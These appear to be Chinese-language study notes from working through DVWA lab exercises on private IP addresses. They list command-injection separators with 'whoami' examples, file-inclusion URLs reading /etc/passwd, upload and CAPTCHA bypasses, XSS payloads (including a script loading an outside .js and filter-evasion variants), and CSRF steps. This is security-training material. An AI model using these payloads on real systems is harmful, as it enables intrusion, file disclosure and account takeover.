命令行注入(对命令行内容没有校验)
注释&;|-$()`|| &&空格
windows系列支持的管道符如下所示
|:直接执行后面的语句,如ping 127.0.0.1 | whoami
||:如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假,如ping 2 || whoami
&:如果前面的语句为假则直接执行后面的语句,如ping 127.0.0.1 & whoami
&&:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真,如ping 127.0.0.1 && whoami
Linux系列支持的管道符如下所示
;:执行完前面的语句再执行后面的如ping 127.0.0.1; whoami
|:显示后面语句的执行结果,如ping 127.0.0.1 | whoami
||:如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假,如ping 2 || whoami
&:如果前面的语句为假则直接执行后面的语句,如ping 127.0.0.1 & whoami
&&:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真,如ping 127.0.0.1 && whoami
文件包含(include文件包含)
http://10.89.184.75:50001/vulnerabilities/fi/?page=file1.php
修改文件路径,可以直接访问系统文件
http://10.89.184.75:50001/vulnerabilities/fi/?page=/etc/passwd
http://192.168.0.110:5678/vulnerabilities/fi/?page=http://www.baidu.com
http://192.168.0.110:5678/vulnerabilities/fi/?page=file:///etc/apache2/apache2.conf
文件上传漏洞(对文件类型、文件后缀没有校验)
图片上传漏洞-低级(没有判断Content-Type和文件后缀名)
../../hackable/uploads/phpinfo.php succesfully uploaded!
http://10.89.184.75:50001/hackable/uploads/phpinfo.php
图片上传漏洞-中级(只判断了Content-Type,没有判断文件后缀名,直接使用burnsuit修改Content-Type规避)
Content-Type: image/png ----application/text
图片上传漏洞-高级?
既是图片也是代码?
不安全的验证码
低级漏洞,校验和修改密码分2步骤,可以通过修改请求消息(burn或表单)绕过去
step=2&password_new=123456&password_conf=123456&recaptcha_challenge_field=SHUTDOWN&recaptcha_response_field=&Change=Change
Weak Session IDs
低级漏洞:+1
中级漏洞:时间戳
高级漏洞:MD5加密
不可能的:SHA1
SQL注入
sql语句条件判断
修改form表单id
SQL注入(Blind)
反射型XSS功能(Reflected Cross Site Scripting)
XSS (Cross-site scripting) 攻击,原本开发者想的是显示数据,攻击者输入确实破坏性的代码。主要应用于“HTML注入”
低级漏洞
<script>alert(1)</script>
<script src="//www.a.com/test.js"></script>
中级漏洞(大小写或利用字符替换的漏洞)
<Script src="//www.a.com/test.js"></Script>
<scr<script>ipt src="//www.a.com/test.js"></script>
高级漏洞(图片注入)
<img src="http://127.0.0.1/test/1.png">
存储型XSS攻击
低级漏洞(对message注入)
<script>alert(1)</script>
中级漏洞(对name注入,需要修改maxlength)
<Script>alert(1)</Script>
高级漏洞(图片注入)
<img src="http://127.0.0.1/test/1.png">
DOM型XSS攻击:
低级漏洞(对表单提交的数据逻辑处理漏洞进行js注入)
10.89.184.75:50001/vulnerabilities/xss_d/?default=<script>alert(1)</script>
中级/高级漏洞(利用参数,新增参数插入js语句或利用location.hash)
10.89.184.75:50001/vulnerabilities/xss_d/?default=English&&script<script>alert(1)</script>
10.89.184.75:50001/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>
JavaScript攻击
低级漏洞(token的校验在前台,使用的是MD5)
在输入框输入success,在控制台在调用 generate_token()
中级漏洞(token的校验在js文件中)
在输入框输入success,在控制台在调用do_elsesomething("XX")
高级漏洞
在输入框输入success
token_part_1("ABCD", 44)
token_part_2("XX")
点击按钮会执行token_part_3()
CSRF攻击(Cross Site Request Forgery):跨站请求伪造攻击
低级漏洞(对来源地址没有校验)
通过BurpSuite生成修改密码的Csrf的html代码:右击->Engagement tools->Generate CSRF PoC
将生成的代码发布到一个网站中,如http://127.0.0.1/test/csrf.html,然后诱导用户访问,当目标用户处于登陆状态,并同一浏览器访问了该网站后,目标用 户就会修改密码
中级漏洞(通过文件命名规避来源地址检查)
10.89.184.75.html
高级漏洞
绕过内容安全策略Content Security Policy(CSP)Bypass